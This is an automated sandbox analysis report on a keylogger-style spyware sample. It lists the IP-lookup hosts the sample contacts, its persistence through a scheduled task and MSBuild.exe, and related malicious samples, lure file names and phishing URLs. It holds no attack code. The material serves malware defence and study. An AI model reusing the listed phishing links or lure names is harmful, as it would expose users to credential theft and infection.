http://checkip.dyndns.org	MSBuild.exe, 00000009.00000002.4701100037.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	hesaphareketi-01.exe, 00000000.00000002.2285058032.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2338590295.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/173.254.250.80$	MSBuild.exe, 00000009.00000002.4701100037.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	hesaphareketi-01.exe, 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.h	MSBuild.exe, 00000010.00000002.4699689315.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.org	MSBuild.exe, 00000009.00000002.4701100037.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	hesaphareketi-01.exe, 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
50.31.176.103	unknown	United States	23352	SERVERCENTRALUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1550346
Start date and time:	2024-11-06 17:01:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hesaphareketi-01.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/15@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 142 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.113.103.199, 184.28.90.27, 52.149.20.212, 192.229.221.95, 20.242.39.171, 199.232.214.172, 40.69.42.241, 20.12.23.50, 172.202.163.200, 40.113.110.67, 104.102.63.47
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e15275.d.akamaiedge.net, otelrules.afd.azureedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, wildcard.weather.microsoft.com.edgekey.net, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: hesaphareketi-01.exe

Simulations

Behavior and APIs

Time	Type	Description
11:02:38	API Interceptor	2x Sleep call for process: hesaphareketi-01.exe modified
11:02:40	API Interceptor	39x Sleep call for process: powershell.exe modified
11:02:43	API Interceptor	2x Sleep call for process: WvaGpcFVX.exe modified
11:02:44	API Interceptor	13137860x Sleep call for process: MSBuild.exe modified
17:02:42	Task Scheduler	Run new task: WvaGpcFVX path: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.122.6.168	173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Maria Sibirtseva Professional CV.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO#7372732993039398372372973928392832973PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Justificante de pago.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	xBA TM06-Q6-11-24.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	T4WYgRfsgy.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	f0lMzqvvfh.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	5jh97SOa7H.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.RATX-gen.5672.16639.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
188.114.96.3	2rI5YEg7uo.exe	Get hash	malicious	FormBook	Browse	www.evoolixyppuk.shop/7gfa/?pP=OC/NqFuXSoQKcxJzIwbC8gc6YWk63HA88JkIsR5MBtbsuoT1qNc3mE+usci2f4e+0fIXV/Px1LgbGc4SbpFIftMOxDoszWQURSPAVqq521dqxxqHUw==&UJO=A6MH4FUp
	createdbestthingswithgoodnewswithgreatfriendship.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	paste.ee/d/PAg0l
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/O7tfWEfj/download
	NIlfETZ9aE.exe	Get hash	malicious	FormBook	Browse	www.timizoasisey.shop/agaq/
	https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.com	Get hash	malicious	HTMLPhisher	Browse	uniteseoul.com/
	ffsBbRe8UN.exe	Get hash	malicious	FormBook	Browse	www.serverplay.live/sp1b/
	09Iz0ja549.exe	Get hash	malicious	FormBook	Browse	www.evoolixyppuk.shop/t98t/
	nCYUA8nqsg.exe	Get hash	malicious	FormBook	Browse	www.obuvmaster.website/l3kr/
	mBms4I508x.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/wgog/
	PO-000172483.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/2b9b/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	x6BqJ693rc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	z349dth1eOtMzxuuRN.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	doc20247622056002_pentamix.bat	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	6b94X7dMrG.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	5gz6ZZRQWh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	46roqD3HEE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	iENcsTur6E.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.FileRepMalware.29777.16321.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Maria Sibirtseva Professional CV.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
s-part-0017.t-0009.t-msedge.net	https://sendspace.com/pro/z42su8	Get hash	malicious	Mamba2FA	Browse	13.107.246.45
	Payment Confirmation (237 KB).msg	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	13.107.246.45
	NVWLJmqmzn.dll	Get hash	malicious	Strela Stealer	Browse	13.107.246.45
	x6BqJ693rc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
	wmKmOQ868z.exe	Get hash	malicious	FormBook, GuLoader	Browse	13.107.246.45
	http://go.wafykoe.com/0nbe	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	YESOHDKMIm.exe	Get hash	malicious	Remcos	Browse	13.107.246.45
	https://www.google.co.in/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/braswells@helenaindustries.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	fIwP4c7xYt.exe	Get hash	malicious	GuLoader	Browse	13.107.246.45
	2CUvvDyapb.exe	Get hash	malicious	Remcos	Browse	13.107.246.45
fp2e7a.wpc.phicdn.net	https://www.google.com/url?q=https://alhmusa.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdIUkpVa009JnVpZD1VU0VSMTUxMDIwMjRVMDExMDE1NDE%3D&sa=D&source=editors&ust=1730911677097978&usg=AOvVaw0lzPnbpui3_6j_tDBkURnO	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://go.wafykoe.com/0nbe	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://www.google.co.in/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/braswells@helenaindustries.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://links.giveawayoftheday.com/external?url=https%3A%2F%2Fcertify.us.org/B4G4RAI1Aanz01haD5Qm3TI1Anw4GD5Q2APnufoTxun4DCam3TI1AoTxnz01oTx4RAw4G	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://pub.lucidpress.com/50f1c535-8058-4eec-b469-2bd69fae4557/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://nfetgz.hascl.co.uk/YvkFcBQO	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://blacksaltys.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://edveha.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://booking.com@slongre.com/vrmcoabu	Get hash	malicious	Unknown	Browse	192.229.221.95
	file.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
bg.microsoft.map.fastly.net	https://sites.google.com/view/ca7k/home	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://www.google.com/url?q=https://alhmusa.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdIUkpVa009JnVpZD1VU0VSMTUxMDIwMjRVMDExMDE1NDE%3D&sa=D&source=editors&ust=1730911677097978&usg=AOvVaw0lzPnbpui3_6j_tDBkURnO	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://go.wafykoe.com/0nbe	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://www.google.co.in/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/braswells@helenaindustries.com	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://links.giveawayoftheday.com/external?url=https%3A%2F%2Fcertify.us.org/B4G4RAI1Aanz01haD5Qm3TI1Anw4GD5Q2APnufoTxun4DCam3TI1AoTxnz01oTx4RAw4G	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://pub.lucidpress.com/50f1c535-8058-4eec-b469-2bd69fae4557/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://nfetgz.hascl.co.uk/YvkFcBQO	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://blacksaltys.com	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://blacksaltys.com	Get hash	malicious	Unknown	Browse	199.232.210.172
	Iamgold_Docs_Access3aecd483-6211-46f6-ad1d-bba6268615a6_OFZCB.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	x6BqJ693rc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	vHXObqOSGu.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	z349dth1eOtMzxuuRN.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	46roqD3HEE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	46roqD3HEE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	iENcsTur6E.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	2tKeEoCCCw.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
	173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Maria Sibirtseva Professional CV.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	PO#7372732993039398372372973928392832973PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
CLOUDFLARENETUS	https://sendspace.com/pro/z42su8	Get hash	malicious	Mamba2FA	Browse	172.67.170.105
	Payment Confirmation (237 KB).msg	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.17.25.14
	Invoice_INV487253_1730829266104.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	[EXTERNAL] Complete with Docusign_ Review_&_sign_Docu #526890 Contract_Agreement.pdf.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	x6BqJ693rc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	PV2Ch2EAZe.exe	Get hash	malicious	LummaC	Browse	172.67.187.9
	http://go.wafykoe.com/0nbe	Get hash	malicious	HTMLPhisher	Browse	104.16.124.96
	WTz1CiJLNZ.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	IF787e5nei.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
SERVERCENTRALUS	pedido.pif.exe	Get hash	malicious	Snake Keylogger	Browse	50.31.176.103
	https://link.edgepilot.com/s/e9b35021/KNsrNVGwOUukNjaKm_560w?u=https://publicidadnicaragua.com/	Get hash	malicious	Unknown	Browse	216.246.47.153
	kkkarm7.elf	Get hash	malicious	Unknown	Browse	204.93.205.45
	WIpGif4IRrFfamQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	75.102.58.14
	https://aws.predictiveresponse.net/fwdhs.htm?redirect=https://shermsco.com/umtdby0g5ztccrxs-790065	Get hash	malicious	Unknown	Browse	216.246.112.38
	http://www.tiktokchat.shop/	Get hash	malicious	Unknown	Browse	75.102.49.249
	http://fullgasesspa.cl	Get hash	malicious	Unknown	Browse	216.246.46.105
	hNX3ktCRra.elf	Get hash	malicious	Unknown	Browse	66.225.201.22
	https://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	216.246.46.21
	https://login0fficemailverify.laiora.cfd/ilog.htm	Get hash	malicious	Unknown	Browse	205.234.232.49

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://sites.google.com/view/ca7k/home	Get hash	malicious	Unknown	Browse	13.107.246.45
	Payment Confirmation (237 KB).msg	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	13.107.246.45
	https://www.google.com/url?q=https://alhmusa.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdIUkpVa009JnVpZD1VU0VSMTUxMDIwMjRVMDExMDE1NDE%3D&sa=D&source=editors&ust=1730911677097978&usg=AOvVaw0lzPnbpui3_6j_tDBkURnO	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://go.wafykoe.com/0nbe	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://www.google.co.in/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/braswells@helenaindustries.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://links.giveawayoftheday.com/external?url=https%3A%2F%2Fcertify.us.org/B4G4RAI1Aanz01haD5Qm3TI1Anw4GD5Q2APnufoTxun4DCam3TI1AoTxnz01oTx4RAw4G	Get hash	malicious	Unknown	Browse	13.107.246.45
	2CUvvDyapb.exe	Get hash	malicious	Remcos	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	13.107.246.45
	Play____Now_AUD__autoresponsed50001b20f2d0a072379154d3aab44a3a4736f9c.htm	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://qr.link/YzVlSa	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	13.107.246.45
54328bd36c14bd82ddaa0c04b25ed9ad	x6BqJ693rc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z349dth1eOtMzxuuRN.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	6b94X7dMrG.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	lime_single.exe	Get hash	malicious	LimeRAT	Browse	188.114.96.3
	5gz6ZZRQWh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	46roqD3HEE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	iENcsTur6E.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.FileRepMalware.29777.16321.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Maria Sibirtseva Professional CV.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3

Process:	C:\Users\user\AppData\Roaming\WvaGpcFVX.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-01.exe.log

Download File

Process:	C:\Users\user\Desktop\hesaphareketi-01.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
